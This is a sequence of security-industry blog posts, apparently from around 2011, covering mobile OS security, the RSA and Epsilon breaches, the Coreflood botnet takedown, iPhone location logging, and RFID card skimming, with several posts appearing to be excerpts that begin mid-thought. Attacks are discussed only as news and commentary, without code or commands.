The Current State of Mobile Device Security

Symantec’s Carey Nachemburg (hi, Carey!) posted a short write-up on their analysis of the Apple iOS and Google Android mobile operating systems from a security point of view. Carey calls Apple iOS “not perfect… [but] well designed and has thus far proven largely resistant to most types of attacks.” That’s essentially the conclusion I came to a year ago while I was a Forrester analyst (I was the first analyst to pronounce the iPhone and iPad “safe for business”). The full report is here. It is a bit superficial and contains a few glaring errors related to encryption, but is mostly well-done. I recommend you read it. In the case of iOS, it’s nice to see Symantec acknowledging that Apple mostly got the security model right after years of fearmongering. In the case of Android, Carey’s conclusions also mirror my own: the delegation of security choices to the consumer isn’t good for security, nor is what he calls the “provenance model.” (In plain English, this means that consumers can install apps from just about anywhere, including dubious sources; this is the opposite of Apple’s curated App Store model.)

I have two minor caveats about the paper: first, consider the source. Most of the issues in the paper discuss security topics through the lens of malware and data loss. That’s appropriate, given what Symantec sells: anti-virus, DLP and network security products, but the mobile’s defining security issue — privacy! — receives very little treatment at all, and its omission is surprising. Second, there are better and more substantive technical analyses of Android and iOS out there. For Android, check out Jesse Burns’ 2009 Black Hat presentation and his follow-up presentation at Hashdays 2010. For iOS, Dino Dai Zovi’s 2011 Black Hat presentation (“Apple iOS Security Evaluation“) looks like it will be terrific (I’ve spoken to him about it). So if you plan to be at Black Hat in August, do not miss this one.

Take a bow everybody, the security industry really failed this time

Errata Security’s David Maynor, who has been relatively quiet for quite a while, posts a beauty. He absolutely nails the key point of the LulzSec and Anonymous hacking chaos: “I’ve heard a lot of people say that Lulzsec did security a favor by really showing the need for security. I disagree completely. I think Lulzsec has show how ineffective the security community and marketplace really is. These were not mom and pop targets that got hit but instead were several mega corporations that spend more money on security than most people will make in a lifetime. The spending did not stop the compromise and posting of their sensitive data so what good is it?”

Dave’s point is worth noting: both LulzSec and Anonymous introduce elements of chaos and activism into the information security landscape. Both of these groups demonstrate that gear and tools alone won’t help companies defend themselves against determined adversaries who want to compromise them. As the discussion about the Advanced Persistent Chinese Threat has shown, there’s a world of difference between being a target of choice rather than a target of chance. Human firewalls (monitoring, diligence, vigilence) matters. Worth a read.

It’s Getting Awfully Lonely in PC Land

A Barron’s article shines a spotlight on the elephant in the room: with all of the energy and profits in the computing industry moving to Post-PC devices (smartphones and tablets), is being a commodity PC maker worth it any more?  From the article: “It’s a theme you hear again and again: That terrible PC market? We’ve got nothing to do with that… so unloved is the business that Sanford Bernstein analyst Toni Sacconaghi offered a think piece last week in which he pondered whether HP and Dell could dump their PC businesses. Sacconaghi doesn’t think they can or should, and he doesn’t think they will, but a lot of that has to do with both being rather stuck in those markets with no practical exit strategy.” If you attended my webinar on Best Practices for Mobile Security, you’ll recall some market growth figures I cited, from industry analyst Gartner. In particular: by 2015, nearly three-quarters of the internet-capable devices will be Post-PC devices, not traditional PCs. This will change the way we work. And it is changing how we think about security.

Three Lessons from the RSA Hack, from a Customer’s Perspective

Last but not least, my latest column for SecurityWeek went live last week. In this article, I describe Perimeter’s view of the RSA SecurID token hack.  The first shoe dropped in March, when the company disclosed via press release that an unknown attacker, likely a state-sponsored actor, stole certain unidentified assets related to its SecurID product. The other shoe dropped last month when Lockheed Martin revealed that attackers had tried to break in to the defense contractor using the materials they stole in March. That made the risks that RSA had characterized as “hypothetical” much more real. I observed three things about this incident: (1) even the most trusted technologies fail; (2) the incident illustrates what “risk management” is all about; and (3) customers should always come first. If I had to grade RSA’s responses, both to the initial hack and to the more recent revelations, I could not give them better than a D. Read this article if you want to see our take on the issue.

Longtime Microsoft columnist Ed Bott made national news on May 2nd, when he asserted categorically that “serious malware is coming soon to a Mac near you.” As evidence, Ed pointed to a video made by a Danish IT security company named the CSIS eCrime Unit, a company I have never heard of. That video describes a “crimeware” program that can build Mac-compatible Trojan-horse programs for capturing keystrokes and passwords. To lure customers into installing the Trojan, customers that visit poisoned websites are shown native-looking dialogs that try to scare them into downloading fake security software. Ed has since followed up his initial column with four more posts on the same subject. The most recent one describes a large increase in customers who are complaining about malware in Apple support forums. All of these posts are meant to persuade readers that, indeed, the Mac is becoming just like Windows: malware-laden and dangerous… I ask four questions:

• Who benefits from the story?

• Why should we care?

• If we do care, what do we do about it?

• What else should we be thinking about?

You can read the column in full at the SecurityWeek website.

Here, then, is the second annual dictionary.

Data loss prevention, noun. Having enough backup capacity and fault tolerance to withstand a significant outage without destroying storage media. E.g., “I sure wish Amazon had a data loss prevention strategy. It would’ve saved my bacon when EC2 went down.”

Exfiltrate, noun. Used coffee grounds. E.g., “I went to throw out my kitchen trash, but it stank because it was full of exfiltrate.”

Remote wipe, phrase. A radio-controlled windshield squeegee.

Compliant, adjective. A feeling of zen-like calm that pervades an organization immediately before a data security breach. Related: see also PCI-DSS e.g., B. Russo: “No organization compliant with PCI-DSS has ever been breached.”

Location-based services, phrase.

Phishing, noun. The practice of trolling for online victims by sending emails containing lurid headlines, fake correspondence from acquaintances or false pretenses to lure prospects to malicious websites.*

Mobile security, phrase. (1) A Taser. (2) An illusory market opportunity.

Spear phishing, phrase. See phishing. Considered superfluous.

Privacy policy, phrase. The practice of promiscuously disseminating personal information about consumers; generally halted when television cameras are on and customers catch on.

Whaling, noun. See phishing. Considered superfluous and causes spontaneous giggles in listeners when uttered.

Advanced persistent threat, phrase. An obscure medical condition, similar to plantar warts, that can only be cured by regular and vigorous application of miracle tonic.

Vishing, noun. See phishing. Considered superfluous and causes speakers to be defenstrated when uttered.

Cloud Security Alliance, proper noun. A dinnertime speakers society, similar to Toastmasters.

Encryption, noun. A auditor-prescribed nasal spray that eases lung congestion when inhaled by the afflicted. Popular brands prescribed include 2BIT, SHA and XOR.

* This is, more or less, the real definition.

Plenty of commentators commented as you would expect. Sophos’ Graham Clueley was uncharacteristically restrained, suggesting that “most users would not expect their iPhones to be doing this and they’d have a right to be upset. [But] I think things tend not to be conspiracies, but are more often cock-ups, accidents that happen.” My former colleague Chenxi Wang at Forrester Research was harsher, and swiftly pronounced the incident a “breach of trust.” She also got in the “bookend” quote in the New York Times in a story about the subject, saying that “It doesn’t matter how Apple explains its way out of this, just the fact that consumers know that their phone is being tracked is a very big deal.”

Noted wily-hacker repeller Steve Bellovin got the early story about right, noting that the location information that the iPhone is limited to coarse-grained data. He states correctly that “log files are useful operationally, but also represent a privacy threat if misused” and then asks the key question: “is this data ever sent to Apple? … If it should turn out that Apple is receiving the data, the privacy threat becomes very great. It is also highly likely that Apple will suffer a major PR problem and probably legal consequences as well.”

After the early stories ran, we learned that the location data Apple has been collecting have been present on iPhones for a long, long time: in its current format since at least June 2010, and in other forms since before that. Alex Levinson wrote on his blog that the “this hidden [location] file is neither new nor secret,” and showed photographs of pages from his book “iOS Forensics” (co-authored with Sean Morrissey) that came out in December. He also pointed out that prior to iOS 4, similar location-tracking logs were kept in a different (root-accessible-only) Plist file.

Meanwhile, the Feds have started to ask pointed questions. Last Thursday, US House Representative Ed Markey sent Steve Jobs a letter, asking about the purpose of the location-logging feature, whether the devices actually transmit their location data back to Apple, what Apple does with the data and whether customers have the ability to opt-out. The German Data Protection Authority has stated that the collection of personally identifying information without explicit consent may be illegal under EU law.

As of this morning, additional stories from the Wall Street Journal and other publications fill in a few more missing details:

• We learned that mobile forensics firms like Levinson’s have known about the iPhone’s location data-logging capability for a while
• We learned that iPhones do, in fact, transmit at least some of the location data they collect back to Apple, apparently anonymously
• We learned that Google’s Android operating system has been collection similar information, and that both Google and Apple are using the data they collect to make their location-based services, such as mapping, more effective

This is a fast-moving story, and more facts will doubtlessly emerge over the next few weeks and days. What’s been striking about this story is how explosive it has been: how quickly it flooded the news outlets, and how quickly the Federales have gotten involved. It’s equally striking how explosive the story has been compared to other security and privacy stories. To put this in perspective: as a society, we have tolerated nearly twenty years of PC insecurity, with dire consequences for all involved and in the face of the diminishing effectiveness of available countermeasures. As we all know, millions of customers’ computers are 0wned by botnet operators who scour hard drives for credit card numbers or install keyloggers to capture bank credentials. Billions of dollars have been spent on anti-virus software to counteract what economists would probably call an externality. Worst of all, plenty of evidence abounds that AV protections are failing. And yet there has been zero action in Congress for software liability laws that might cause software makers bear any of the burden of insecure products. Of course, we’re happy to pass the cost on to the banks via the Red Flags Rule. Because everybody knows banks are soft targets with plenty of money, right?

But by contrast, here we have a story about a handset maker (Apple) that is collecting diagnostic information about where the devices it makes are being used. This handset maker is probably collecting the data for fairly benign reasons, but might be doing it for nefarious ones too. We don’t know yet. But because the information has the potential to be a tracking service, people are pissed off, creeped out, and calling for Congressional action. What this tells me is that location-tracking — the fear of Little Brother aka Steve Jobs — resonates with the public in ways that other security issues do not.

Location-tracking even seems to trump the privacy issues that we already know are pervasive with related internet technologies: notably, e-mail web bugs, cookies, search engines, Facebook and e-mail indexers. And yet no security and privacy stories have struck the nerve this one has. Computer owned? Yeah that sucks, but whatever, I’ll keep buying Windows. Eerily uncanny ads in your Gmail? A little creepy, but the e-mail is “free” so I don’t mind. Phone tracked? CALL YOUR CONGRESSMAN!

This particular iPhone story is just the tip of the mobile privacy iceberg. Beyond location tracking, we know that many mobile application makers, like Pandora, are transmitting location data, gender and listening habits to advertisers (tip of the hat to my friends at Verac0de). Earlier studies from firms such as Lookout have shown that chatty mobile apps tend to generally overshare your personal information.

What to make of all this? I choose to take the optimistic view. Here’s why:

• Privacy, not security, will be the dominant issue with mobile devices. I’ve made this point many times before, more recently during last week’s webinar on mobile security best practices. I highly recommend you watch the webinar, and not just because the presenter is a devilishly handsome, silver-tongued know-it-all.
• Sunlight is the best disinfectant. Revelations about collection of sensitive location and personal information is going to increase calls for Congressional action, which frankly I feel is a positive development. The sooner this stuff gets out in the open, the better.
• The US will get better data privacy laws. The US is likely to regulate more tightly the collection of personal information about customers by firms. Already, Senators John Kerry and McCain have introduced legislation that will move the US closer to the EU in terms of how consumer consent is collected, and in terms of the amount of control consumers have over the information entrusted to the firms they do business with. Remember, you heard it here first — I predicted this in December of last year. A cynical note: expect a generous carve-out for existing Little Brother financial data aggregators like Experian and Fair Isaac.
• The dividing line between telemetry and Your Stuff will be clearer. Apple has previously claimed that the location data it receives from its devices are anonymized and aren’t tied to particular devices (and thus, cannot be re-associated with particular customers). If so, you’d probably properly call the information Apple receives telemetry.  The regulation that may be coming will help clarify what the rules for using telemetry data will be, and should help delineate what types of information are really for diagnostic purposes, and what qualifies as personal information — that is to say, what is Your Stuff.
• Corporations will be under more pressure to be good custodians of the data they collect. Those of you who have followed my research as an analyst know that I divide sensitive data into two types: “toxic data” about customers, such as the personally identifying variety, and “secrets” such as copyrights, patents, various intellectual property and other strategic information. Location data falls into the “toxic data” category, and as such, corporations who keep such data have a responsibility to safeguard the data they keep on behalf of their customers. If we see privacy legislation such as McCain-Kerry take wind in Congress, custodianship of customer data will quickly become a CEO-level issue.

So, that’s my take. As always, I welcome your comments, pesky questions, kind words, tweets, and trackbacks.

On Wednesday April 6th the Federal Bureau of Investigation (FBI) seized control of 5 servers used to control as many as 2 million computers infected with Coreflood malware. This malware, also known as AFCore, quietly steals personal and financial information from the computer and forwards the information to the criminal ring leaders. The attackers use the information collected by AFCore to conduct fraudulent wire transfers, emptying the users’ bank accounts.  The botnet is suspected to have existed since at least 2002, and has evolved over the years from using IRC based command and control and selling DDOS/anonymity services, to HTTP based command and control and performing fraud.

Using a similar approach used to take down the Bredolab botnet, US federal investigators were granted special authorization by the Department of Justice to substitute their own Command and Control server for the hosts operated by the criminal organization.  When the bot of the infected machine checks into the new C&C it is simply given a command to shutdown.  The DNS records used by the bots have also been pointed to Shadowserver’s sinkholes.

Seizing control of the C&C servers by law enforcement is now preventing the criminals from accessing any information already harvested by the infected computers.  It also keeps them from covering their tracks by deleting files and terminating processes.  However, the millions of Coreflood infections remain intact and still require intervention by a trained security analyst or antivirus program with signatures to detect it. Investigators are also alerting the Internet Service Providers of the compromised machines and requesting they inform their customers.

More information about the takedown can be found here:

• Botnet Operation Disabled: FBI Seizes Servers to Stop Cyber Fraud
• Bold FBI Move Shutters COREFLOOD Bot

Perimeter’s Security Operations Center is actively monitoring for outbound activity known to be associated with the Coreflood botnet.  In one instance, minutes after adding inspection for the redirected C&C check-in, alerts indicated a single customer network to have 17 actively compromised hosts. Here’s a sample screenshot from our SOC’s Security and Information Event Management System:

Coreflood Botnet Traffic, from Perimeter SOC

Looking at the raw event logs, we can see that the compromised host is attempting direct HTTP connections to a sinkhole IP. The URI confirms the activity to be related to a bot C&C check-in:

Recommendations for Perimeter customers

Although the FBI has taken ownership of the Command and Control and are issuing shutdown commands to the active bots, the malware is still installed on the compromised machines and reactivated at bootup.  Analysis of this Coreflood variant indicates the C&C domains change monthly and have been pre-registered in countries that are outside of United States jurisdiction.  There still remains a possiblity of the criminal ring regaining control of the botnet.  Perimeter strongly recommends customers take the following actions to stay protected:

• Use Web Content Filtering to lockdown Internet usage by enforcing user authentication and blocking of categories not critical to business
• In particular, customers are strongly advised to block access to unclassified sites, which commonly harbor malware and C&C servers
• Use standard best practices such as Network IPS and Network/Desktop AV to help prevent infections
• In cases where infections do occur, a strong WCF policy will help prevent theft of data, and will provide additional logging information used by the Perimeter’s Security Operations Center

Thanks for your time and attention, and stay safe.

Over the past week a massive ongoing SQL injection campaign has compromised more than 1.5 million sites according to a BBC report and other outlets. Our friends at Websense broke the news first. Dancho Danchev has a nice writeup too.

The Perimeter Security Operations Center has been watching this massive attack spread quickly throughout the web. We have seen small campaigns as well with attacks very similar to this since September 2010, but not of this magnitude. So far, what we have been able to gather:

• the attack performs an SQL injection against a currently unidentified web application. Note that this does not necessarily mean SQL Server or other databases are necessarily vulnerable themselves
• after the SQL injection is performed against the site, the attack injects a malicious script in a obfuscated .php file into the website
• the malicious .php file redirects a visitor to compromised URLs that direct them to a fake anti-virus download site. The redirections are visible to the user, because the pages show a fake antivirus scan
• as with any type of fake AV malware, the scan is of course fake, and follows with the standard prompt to download a malicious file made to look like a legitimate installer file

The Perimeter Security Operations Center has been following this campaign. We are keeping track of new domains as they become known to us and we have also employed several detection methods based on the hostnames, IP addresses, common strings and executable sizes related to the malicious activity as well as the malware payload it attempts to deliver. We have recently been alerted that the malicious code injections have begun to find their way onto Twitter, luckily the malicious code in the tweets is currently inactive so Twitter users should be safe at the moment.

Late last week, e-mail services firm Epsilon, which manages e-mail campaigns for hundreds of high-profile clients in retail, publishing, consulting and other sectors, revealed that it had been hacked. As a consequence, the attackers were able to obtain the names and e-mail addresses of millions of customers of companies like Citigroup, Walgreens, JP Morgan and many, many others.

Like me, you likely received a notice from a company you do business with informing you of the hack. I got mine from McKinsey Quarterly:

We have been informed by our e-mail service provider, Epsilon, that your e-mail address was exposed by unauthorized entry into their system. Epsilon sends e-mails on our behalf to McKinsey Quarterly users who have opted to receive e-mail communications from us.

We have been assured by Epsilon that the only information that was obtained was your first name, last name and e-mail address and that the files that were accessed did not include any other information. We are actively working to confirm this. We do not store any credit card numbers, social security numbers, or other personally identifiable information of our users, so we can assure you that no such information was accessed.

Please note, it is possible you may receive spam e-mail messages as a result. We want to urge you to be cautious when opening links or attachments from unknown third parties. Also know that McKinsey Quarterly will not send you e-mails asking for your credit card number, social security number or other personally identifiable information. So if you are ever asked for this information, you can be confident it is not from McKinsey.

We regret this has taken place and apologize for any inconvenience this may have caused you. We take your privacy very seriously, and we will continue to work diligently to protect your personal information.

Three quick observations about What It Means:

First, this is embarrassing for Epsilon. It suggests that they have some work to do on their defenses. We don’t know how the attackers got in — it could have been by exploiting a weakness in their web applications (likely), or from a social engineering attack of the type that hosed RSA (less likely).

Second, the attack will be of no consequence to most people. Yes, as many commentators have written, there is an “elevated risk of spear phishing attacks,” which in plain English means this: because the bad guys have your name and e-mail address, they might try to trick you by sending you an e-mail with a funny link. But to be honest, I don’t get much, if any, spam — thanks to Perimeter’s multi-stage e-mail filtering service. And if you use a premium spam filtering service, you probably don’t either. And even if the attackers manage to put together an e-mail that does get through your spam filters, how would you be able to tell that this particular break-in was the cause of it? Right.

Third, nice work McKinsey! The e-mail above is a great example of how to write an unambiguous and clear disclosure e-mail. You’ll note that they spell out exactly what Epsilon says has been disclosed (name and e-mail address, not enough to trigger a PCI or HIPAA violation). They also provide appropriate guidance on what to watch out for, and reinforce that McKinsey employees will never request sensitive information from their customers (which they shouldn’t). This is exactly what you should say in an e-mail like this.

The bottom line is this: spam happens. Just make sure that your employees and colleagues don’t blindly click on attachments they shouldn’t, or blindly click on links embedded in e-mail. Take this incident as an opportunity to reinforce your security policies. But don’t worry too much. Compared to the RSA compromise from a few weeks ago, this is very small beer.

It is not clear whether the theft of this information enables attackers to compromise customers’ own SecurID deployments. RSA claims that the information obtained by the attackers does not. As described in RSA’s advisory (http://www.rsa.com/node.aspx?id=3872):

“[RSA has] no evidence that customer security related to other RSA products has been similarly impacted. We are also confident that no other EMC products were impacted by this attack. It is important to note that we do not believe that either customer or employee personally identifiable information was compromised as a result of this incident.”

However, RSA’s news release notes that “the information extracted does not enable a successful direct attack on any of our RSA SecurID customers, this information could potentially be used to reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack.”

We strongly urge customers to read the full advisory from RSA here: http://www.sec.gov/Archives/edgar/data/790070/000119312511070159/dex992.htm

There is no indication that suggests Perimeter’s customers are at risk. We are continuing to monitor the situation and will send out additional updates as new information is made available.

Defining an enterprise mobile device passcode policy can be surprisingly difficult. Security managers must attempt to reconcile two opposing goals. They must:

• Create a passcode policy that is strong enough to protect the device if it is lost or stolen, while:
• Not annoying users with needless length or complexity

These goals are hard to reconcile because mobile devices like smartphones and tablets are personal, portable and convenient. Employees use their devices in places they wouldn’t use a PC: in the car, during their kids’ football game, and during (shall we say) otherwise unproductive periods of the day. It’s tempting to simply duplicate existing network security policies. The rationale goes something like this: smartphones and tables are nothing more than small PCs with antennas, so the password policies should be the same as for PCs. It’s easy to think that, but it’s the wrong attitude.

This whitepaper will describe the passcode policy Andrew recommends for mobile devices that comply with NIST’s e-authentication Level 1 guidelines as described in Special Publication 800-63, “Electronic Authentication Guidelines”. The policy is reasonable, employee-friendly and highly usable, but strong enough to protect your company’s data. To cut to the chase, here’s what it is:

• 8-digit numeric PIN
• Simple PINs disallowed
• Automatic lock after 15 minutes
• Grace period of 2 minutes
• Automatic wipe/permanent lock after eight wrong tries
• No expiration

Click here to read the whitepaper.

Facebook recently announced that it has implemented changes to the way a Facebook page can be created. The primary change is that Facebook pages now allow authors to use IFRAME tags in their pages. Previously, authors used Facebook’s custom point and click creation interface. They were also able to create custom Facebook apps that fetched external data from third parties for display on the page. This content was fairly protected because it was all proxied through Facebook. This caused potentially malicious Java and Flash exploits not to function.

So why is this change so important to your security?

Simple: IFRAMEs are evil. And because IFRAME tags can now  be included in Facebook apps, proxying can now be circumvented. This is very good news for malware writers and other cyber criminals because social engineering is no longer required to convince users to navigate to a malicious website. Instead, they can enlist Facebook to help them in their efforts.

For example, it is now possible to set up a default Facebook page, create a profile (the one you first see when you visit a user’s page) and include an app with an IFRAME that contains malicious JavaScript to redirect users to arbitrary websites without any interaction required. This technique is already being used in the wild, to forward users to malicious websites.

Facebook has been informed of the security risks associated with their new feature by our colleagues at Trend Micro, though they have not received a response from Facebook yet.

In the meantime, security conscious customers should consider limiting access to Facebook. Perimeter E-Security Managed Security Service (MSS) customers who use web content filtering can easily put a rule in place blocking access to Facebook URLs.

By Tom Field, Editorial Director, Information Security Media Group

The three pillars on how organizations can be secure today and to participate better in the changing economy:

• Reduce Risk
• Cut Cost
• Enable New Business Opportunities (i.e. Cloud Computing and Mobility)

I’ve spent the week at the RSA Conference. It is a great place to meet colleagues, customers and friends. I had been a Conference Chair for the last 5 years, helping pick speakers and build panels. That was lots of fun, but this year I chose to sit out and let some other lucky soul have a chance. I did participate in the program, however. My friend Caroline Wong put on a panel on security metrics, and asked me to be one of the four panelist. The panel was a blast, and is worth a blog post in its own right.

But the subject of today’s post isn’t my panel, or metrics, but about a key part of the show. It’s about a time-honored ritual at RSA: the industry keynote delivered by Microsoft’s Corporate Vice President of Trustworthy Computing, Scott Charney. In a speech that was covered by multiple media outlets, including IDG News Service, CIO, and Computer Reseller News, Charney made three significant announcements. He:

• Admitted that last year’s suggestion, to require ISPs to cut off serially infected machines, was not realistic because it imposed undue costs on ISPs. Charney argued instead that end-users must take more responsibility for the safety and security of their own machines. To that end, he…
• Proposed a system of “public health certificates” that customer client machines would present to relying parties like banks and on-line websites that needed extra assurance that their customers’ machines were clean. Charney calls this “Collective Defense.” In addition, Charney…
• Argued that the Internet must attribute activities to people wherever we can. Charney argues that with threats, there is always a Who, a What and a Why. Figuring out who the Who is would go a long way to helping national governments fight the various cyber-wars, cyber-skirmishes and cyber-hair-pulling matches that have been documented so well in the press over the last few years.

It seems to me that Scott, as the designated security spokesman for Microsoft, clearly understands his responsibility to set forth a vision for the industry. Microsoft’s preeminent position as the world’s leading software and systems vendor demands that he think big, think fast and think provocatively about The Future of Security. Moreover, the RSA Conference, as the preeminent industry conference devoted to information security, gives Microsoft (and Charney) the perfect platform for presenting their big, fast and provocative thinking. But let’s be honest, there’s a fine line between provocative and pollyanna. This year, Charney donned blue-tinged gossamer winds and fluttered off into the magical land of wishful thinking.

Let’s start with Microsoft’s ideas about Collective Defense and “public health certificates.” If I understand the idea correctly, relying parties (such as banks) would elect to trust — or selectively trust, or not trust — devices that presented digitally-signed attestations about their health. Rather than call this Collective Defense, let’s call it NAC’s Nephew. Practically, here is what that would mean: if McAfee or Symantec AV tells your bank that you have a clean bill of health, then your bank ought to let you transfer your money to Liberia. But if you don’t, they might think twice or ask for secondary authentication.

If you are technologist, especially one who drinks the Better Living Through Cryptography Kool-Aid or believes that “non-repudiation” actually refers to a real legal concept, digitally-signed health certificates sure sounds like a great idea. But upon closer scrutiny, nagging questions about practicality, implementation complexity and the so-what factor make it less attractive. Dan Geer has noted that technologists need to beware whenever they catch themselves saying “…and then a miracle happened.” That’s what we have here. I could raise a dozen objections, including (1) the decreasing efficacy of endpoint anti-malware software, (2) the high likelihood of certificate forgery, (3) the lack of likely implementations for platforms that aren’t Windows, and (4) the serious doubt that banks are asking for this stuff anyway (Trusteer isn’t exactly setting the world on fire, is it?).

But these are just the obvious objections. Slightly more worrying is Charney’s admission that ISPs aren’t part of the solution for keeping PCs safe. By that I assume he meant: Comcast, Time Warner, Charter, Cox had a few objections to cutting off infected customers. I can imagine a conversation between the two Steve Bs (Ballmer and Burke) that went something like this:

Burke (Comcast): So, Steve, I understand that you’d like to have me start cutting off Internet subscribers when we figure out that that their machines are infected.

Ballmer (Microsoft): You better believe it. We’re all-in on making our customers safer. ALL-IN!

Burke: I’ve got 80 million high-speed customers. My customer support team tells me I’ll lose 5m of them within the first year of running this program. That’s 7 billion dollars of lost revenue in the first year.

(pause)

Burke: Are you trying to get me to throw a chair at you?

(pause)

Burke: Excuse me Steve, but you’ll understand if I pass. I’ve got to run anyway. It’s time for me to start working on my 2011 Christmas cards.

That conversation never happened, and the numbers I presented are fictitious. But you can understand why putting the onus on ISPs to “keep their pipes clean” isn’t good for business. That Microsoft realizes this now is merely an admission of reality, and most welcome.

But while Microsoft’s new position reflects a more realistic appreciation of the limits of securing customer computers, Charney doesn’t push his thinking as far as he could. For example, consider his analogy comparing infected PCs to infected people. These are both health risks, and in both cases it behooves authorities to be aware of infections as early as possible. To the extent you can compare people to PCs, It also makes sense to educate customers about basic practices they can take to reduce the risk of infection (although I suspect Symantec might object to the implied comparison of installing their software to hand-washing.)

That said, computers aren’t like people at all. Computing can be improved in ways that the most audacious recombinant DNA theorist can only dream of. Because unlike humans, machines’ “DNA” — the operating systems and software that they are made of — can be replaced wholesale. From the security perspective, operating systems like SELinux, Qubes OS, BlackBerry OS, Apple’s iOS, Google’s Android or even Microsoft’s own Singularity or Windows Phone 7 OSes are fundamentally superior to Windows, because they have built-in protections like code-signing, verified roots-of-trust — often burned into hardware — and mandatory access control. From the security perspective, replacing Windows PCs with trusted Post-PC OSes such as Singularity or iOS isn’t merely a minor improvement like washing your hands. It’s more like replacing humans with a carbon-based life-form that’s immune to influenza.

Now, these other Post-PC OSes and their associated App Stores have other problems that I will be writing about in future posts, such as chatty, privacy-invading apps. But infections that compromise machine integrity isn’t one of their most pressing problems. And yes, I know I’m going to catch a lot of flak from the app security absolutists for saying this (“NOTHING is 100% secure…”). Please. Captain Obvious already paid me a visit today. Given enough time and money, anything is breakable. But acting as if mandatory code-signing, sandboxing and hardware-based trust anchors don’t decrease risk significantly is tantamount to dismissing 30 years of research by people much smarter than you and I. And that, in turn, means that we are ignoring lessons about how software should be built. In other words: we should not let loose talk about “ecosystems” distract from the critical need to re-examine the core software we run on the systems we use in our daily work.

Charney gets close — so very close — to this key point. When he calls for public health certificates that rely on hardware roots-of-trust to vouch for the integrity of devices, he should, instead, ask himself why they are needed in the first place. When he admits that ISPs can’t filter out infected PCs because of the expense, he should be asking whether he ought to, instead, design an operating system that fundamentally resists infection.

And finally, when he suggests that customers should share responsibility for educating themselves about keeping their PCs clean, he should ask himself why they should care, and whether the hassle of “education” and “taking responsibility” is worth it from the customer’s standpoint.

Now that’s a visionary speech I wish he’d made.

Over the last few weeks it seems as though I can’t turn on a TV or pick up a newspaper without reading about the security issues related to Radio Frequency Identification or RFID technology in credit cards.  This seems to be the latest hot topic and I have seen feature stories on both my local and national news channels.  The reality is that this topic is not so new.  If you perform a Google search on “RFID security in Credit Cards” you will see that this security concern stretches all the way back to the early 2000’s.  Hacker’s and security experts have been using RFID reader technology in their hacking arsenal for some time now.  In fact, a simple search of eBay for RFID readers will bring up devices for under a hundred bucks that can skim data from a person walking by.  Even more frightening is that smartphones are now coming equipped with the ability to read RFID signals.  Read about RFID coming to the iPhone: http://www.readwriteweb.com/archives/iphone_as_rfid_tag_reader.php

So why is it such a hot new topic in the last few weeks? Well the simple fact is that while the skimming attack is not new, the adoption of RFID technology has taken off in the last year.  In the past month I personally was issued two new credit cards (replacing my old expired cards) and if I was not specifically looking for it I would have never realized that most credit card companies are now issuing new cards with the RFID technology enabled by default.  I challenge you to look into your wallet or purse and locate your newest card and flip it over.  Chances are that you will see that familiar wireless symbol that indicates RFID technology in the card.  Furthermore if you hold that same card up to a bright light you can probably make out the chip that is embedded into the card.

Mystery solved…with more and more cards enabled with this technology this old skimming attack resurfaced into the limelight and televisions stations all over the world are picking up the story.  So much in fact that sales of aluminum credit card sleeves and insulated wallets (technology that shields the frequency from being skimmed) have shot through the roof.

However, let’s dig a little deeper into the real risks associated with this technology in credit cards before we all run around in a panic.  I want to first state that I am a security guy so I don’t want to lighten the concern but rather educate you on the real risk.  First let’s take the RFID readers that you can buy from eBay or enable in your smartphones and analyze what these devices can do.  Typically the reading signals from these low end devices are fairly weak.  Meaning that in order for a skimming attack to work a person that walks by you with one of these devices would have to align their skimmer and your wallet within a few centimeters of each other.  Think about it…when you walk up to a gas pump to pay with a speed pass you have to remove the card from your wallet and hold it a few inches from the reader for it to register.

Secondly, if you examine the actual data that is able to be skimmed from these readers you will notice that the reader will essentially gather the same information that is publically displayable on the front of the card, such as your full name, the credit card number and expiration.  So basically this skimming attack would gather the same information that I could gleam from performing a simple shoulder surfing attack. The key missing element is that three digit code imprinted on the back of most cards. Since this is the case, cardholders are even making the case that the new RFID technology provides greater privacy than even traditional card payments since the card never leaves your hands and the transmitted data contains less sensitive data than what is imprinted on the back of the card.  You should not be able to make an Internet or phone purchase, since merchant should ask for the 3 digit code on the back, or zip code verification – to complete any purchase.  You can’t create a phony mag stripe card without that data as well. You can’t even create a phony swipe card since encrypted and dynamic verification data is held securely in the chip on the original card.

You can link to the cardholder statements here:

Mastercard – http://www.mastercard.us/paypass.html#/home/

Visa – http://usa.visa.com/personal/cards/paywave/index.html

American Express- https://www295.americanexpress.com/cards/loyalty.do?page=expresspay

The real scary fact that I gathered from these news stories is that since 2006 all new passports issued contain RFID chips and simple scans of these passports can reveal all of your passport data.  Think about the possible risks associated with this and how quickly your data can circle the world into the hands of malicious counterfeiters.  A wise person should spend their money on a protective metal-lined passport jacket instead of a credit card sleeve.

In summary, if all of this doesn’t make you feel a little better than maybe the fact that all of the major credit card companies provide 0% fraud liability if your data is stolen.  I personally have more comfort in the option that a simple hammer and screwdriver will provide.  Just a simple tap from a hammer and screwdriver placed on top of the embedded chip inside the card will render it useless.  I am sure this method is not endorsed by the card issuers, but is the path I elected to take, Google it!

Greetings! Every morning, I do a quick scan of the articles in my Google Reader queue. I have ‘Reader configured to pull about 100 different RSS feeds on different topics ranging from security to high-tech news, plus a variety of “professional hobbies” such as application development. I usually pick out a few articles to actually read. In what I hope will will become a regular feature here at Perimeter Blog Central, here are four that caught my attention today:

1. Malware: Microsoft Disables Autorun for USB

In an innocuously-named post called “Deeper insight into the Security Advisory 967940 update,” my friend and metrics crony Adam Shostack describes why Microsoft is disabling the default Autorun feature in Windows XP and Windows Server 2003 and 2008, and Windows Vista for USB media. As the accompanying MSRC post describes, it means that customers will run a reduced risk of being infected by malware when they insert USB sticks of unknown origin into their computers. I am glad to see Microsoft taking this step to protect customers, but to be fair, USB Autorun/Autoplay was one of the dopiest and riskiest features Microsoft ever introduced. It had FAIL written all over it. Good to see them uninstall it.

2. Metrics: GQM+Strategies For Defining Security Metrics

In his post on security metrics, Brad Bemis describes the Goal-Question-Metrics+Strategies (GQM+Strategies) method for constructing metrics. It’s a good post, and describes a simple methodology that should be useful for customers who want to know how think about the process. An important part of the post (and the method) is the focus on using (1) business objectives to drive the goals, which (2) prompt the questions and (3) lead to the creation of metrics. However, Brad’s “business objectives” discussion is a bit abstract. Fortunately, there are lots of very structured ways that corporations often use frame their objectives. I am a big fan of the Balanced Scorecard, which advocates measuring organizational performance according to the Financial, Customer, Internal Operations, and Learning & Growth perspectives. I describe the “Balanced Security Scorecard” in my book, Security Metrics: Replacing Fear, Uncertainty and Doubt. (In better booksellers everywhere — and did I mention? — it makes a great gift.)

